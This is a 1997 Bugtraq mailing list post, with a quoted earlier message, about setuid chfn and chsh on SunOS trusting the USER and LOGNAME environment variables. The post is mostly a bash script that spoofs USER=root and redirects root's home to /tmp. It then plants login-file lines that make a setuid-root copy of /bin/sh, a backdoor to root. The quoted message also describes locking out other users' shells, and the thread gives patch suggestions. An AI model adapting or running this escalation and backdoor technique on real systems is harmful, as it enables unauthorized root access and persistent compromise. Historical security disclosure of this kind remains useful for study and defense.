Bugtraq mailing list archives
Interim solution for ps
From: blind () SEDATED NET (Trevor Linton)
Date: Mon, 19 May 1997 07:19:31 +0000
Here's a ruff script to get root, this is more then a algorithm then a working script but in "theory" will work. This will work if chsh and chfn is +s'ed. And if they use getenv. ------ CUT ------ #!/bin/bash # # Very basic, i need a way to set root shell to /tmp/.tmp # chfn on some systems will set the directory on some it wont. # depends.. :\ # # patch: # 1) -s both chfn and chsh # 2) edit the source code for chfn and chsh and remove # getenv("LOGNAME") and or getenv("USER") and replace # with getuid(); .. # mkdir -f /tmp/.tmp export USER="root" export LOGNAME="root" echo Set the HOME DIRECTORY RIGHT NOW TO /tmp/.tmp chfn echo "Set the SHELL TO /bin/bash!" chsh echo "cp -a /bin/sh /tmp/.exp" >> /tmp/.tmp/.profile echo "cp -a /bin/sh /tmp/.exp" >> /tmp/.tmp/.bashrc echo "chown root.root /tmp/.exp" >> /tmp/.tmp/.bashrc echo "chown root.root /tmp/.exp" >> /tmp/.tmp/.profile echo "chmod a+sx /tmp/.exp" >> /tmp/.tmp/.bashrc echo "chmod a+sx /tmp/.exp" >> /tmp/.tmp/.profile echo "Exploit set, wait a day then log back on and execute" echo "/tmp/.exp to get root, /tmp/.exp is a sh shell when" echo "root logs in it'll be +s'ed" ----------------- blind - blind () root hax0r org support () hax0r org Swingin' Utters. a juvenile product of the working class. On Mon, 19 May 1997, Nick Simicich wrote:
Of course, if Bash was changed, I could change them from perl, or a C program, and then run bash out of my C program or Perl. You were right the first time - sdon't trust your environment unless you control it. On Sun, 18 May 1997, Trevor Linton wrote:Date: Sun, 18 May 1997 13:36:00 +0000 From: Trevor Linton <blind () SEDATED NET> To: best-of-security () suburbia net Subject: BoS: SunOS exploit. Resent-Date: Tue, 20 May 1997 09:21:05 +1000 (EST) Resent-From: best-of-security () suburbia net On sunos, if you execute a clean bash shell then type, export USER="root" then USER=$LOGNAME, then execute chsh root or chfn root you can change the root information. Why? Well first off chsh and chfn are +s'ed. This is a bad idea in the first Place, Second off chsh and chfn use the function getenv("USER") most programs bother to use this instead of geteuid(); getenv("USER") reports that the user is root (while geteuid(); would report the real userid) and then since chsh and or chfn is +s'ed it'll change root's shell user information or ANYONE on the system's information! On the SunOS system i have i've been able to lock out ANYONES shell using this exploit and locking out root's shell as well as changing anyones NAME info in /etc/passwd etc.. etc.. any program that uses getenv("USER") is vunerable (that's in bash). tcsh and some other shells i remember don't allow USER and LOGNAME modifying. :\ Anyways here's a rough patch: 1) -s the programs that use getenv(); such as chsh and chfn 2) remove getenv() and replace it with geteuid(); 3) possibly get the programmers of bash to fix it so USER and LOGNAME can't be modified unless it's super-user. I'm sure theres a way to get root from this exploit butta.. :) oh well. Trevor Linton (blind) - blind () sedated net support () hax0r org Swingin' Utters. a juvenile product of the working class. "People who are having trouble communicating should just shuttup"Of course my password is the same as my pet's name. My macaw's name was Q47pY!3, but I change it every 90 days. Nick Simicich mailto:njs () scifi squawk com or (last choice) mailto:njs () us ibm com http://scifi.squawk.com/njs.html -- Stop by and Light Up The World!
Current thread:
- Interim solution for ps Trevor Linton (May 19)